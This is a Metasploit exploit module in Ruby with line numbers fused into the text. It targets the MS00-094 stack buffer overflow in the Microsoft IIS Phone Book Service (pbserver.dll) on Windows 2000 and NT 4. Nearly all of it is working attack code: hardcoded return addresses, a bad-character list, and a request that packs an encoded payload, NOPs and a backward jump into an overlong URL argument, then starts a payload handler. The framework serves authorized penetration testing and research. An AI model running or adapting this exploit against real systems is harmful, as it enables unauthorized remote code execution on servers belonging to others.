Path: blob/master/modules/exploits/windows/isapi/ms00_094_pbserver.rb
19664 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking78include Msf::Exploit::Remote::HttpClient910def initialize(info = {})11super(12update_info(13info,14'Name' => 'MS00-094 Microsoft IIS Phone Book Service Overflow',15'Description' => %q{16This is an exploit for the Phone Book Service /pbserver/pbserver.dll17described in MS00-094. By sending an overly long URL argument18for phone book updates, it is possible to overwrite the stack. This19module has only been tested against Windows 2000 SP1.20},21'Author' => [ 'aushack' ],22'License' => MSF_LICENSE,23'References' => [24[ 'CVE', '2000-1089' ],25[ 'OSVDB', '463' ],26[ 'BID', '2048' ],27[ 'MSB', 'MS00-094' ],28],29'Privileged' => false,30'DefaultOptions' => {31'EXITFUNC' => 'thread',32},33'Payload' => {34'Space' => 896,35'BadChars' => "\x00\x0a\x0d\x20%&=?",36'StackAdjustment' => -3500,37},38'Platform' => 'win',39'Targets' => [40['Windows 2000 SP1', { 'Ret' => 0x77e8898b }], # jmp esp kernel32.dll41['Windows 2000 SP0', { 'Ret' => 0x77ea162b }], # call esp kernel32.dll42['Windows NT SP6', { 'Ret' => 0x77f32836 }], # jmp esp kernel32.dll43],44'DisclosureDate' => '2000-12-04',45'DefaultTarget' => 0,46'Notes' => {47'Reliability' => UNKNOWN_RELIABILITY,48'Stability' => UNKNOWN_STABILITY,49'SideEffects' => UNKNOWN_SIDE_EFFECTS50}51)52)5354register_options(55[56OptString.new('URL', [ true, "The path to pbserver.dll", "/pbserver/pbserver.dll" ]),57]58)59end6061def check62print_status("Requesting the vulnerable ISAPI path...")63res = send_request_raw({64'uri' => normalize_uri(datastore['URL'])65}, 5)6667if (res and res.code == 400)68return Exploit::CheckCode::Detected69end7071return Exploit::CheckCode::Safe72end7374def exploit75print_status("Sending overflow...")7677res = send_request_raw({78'uri' => normalize_uri(datastore['URL']) + '?&&&&&&pb=' + payload.encoded + [target['Ret']].pack('V') + make_nops(8) + Rex::Arch::X86.jmp(-912)79}, 5)8081handler82end83end848586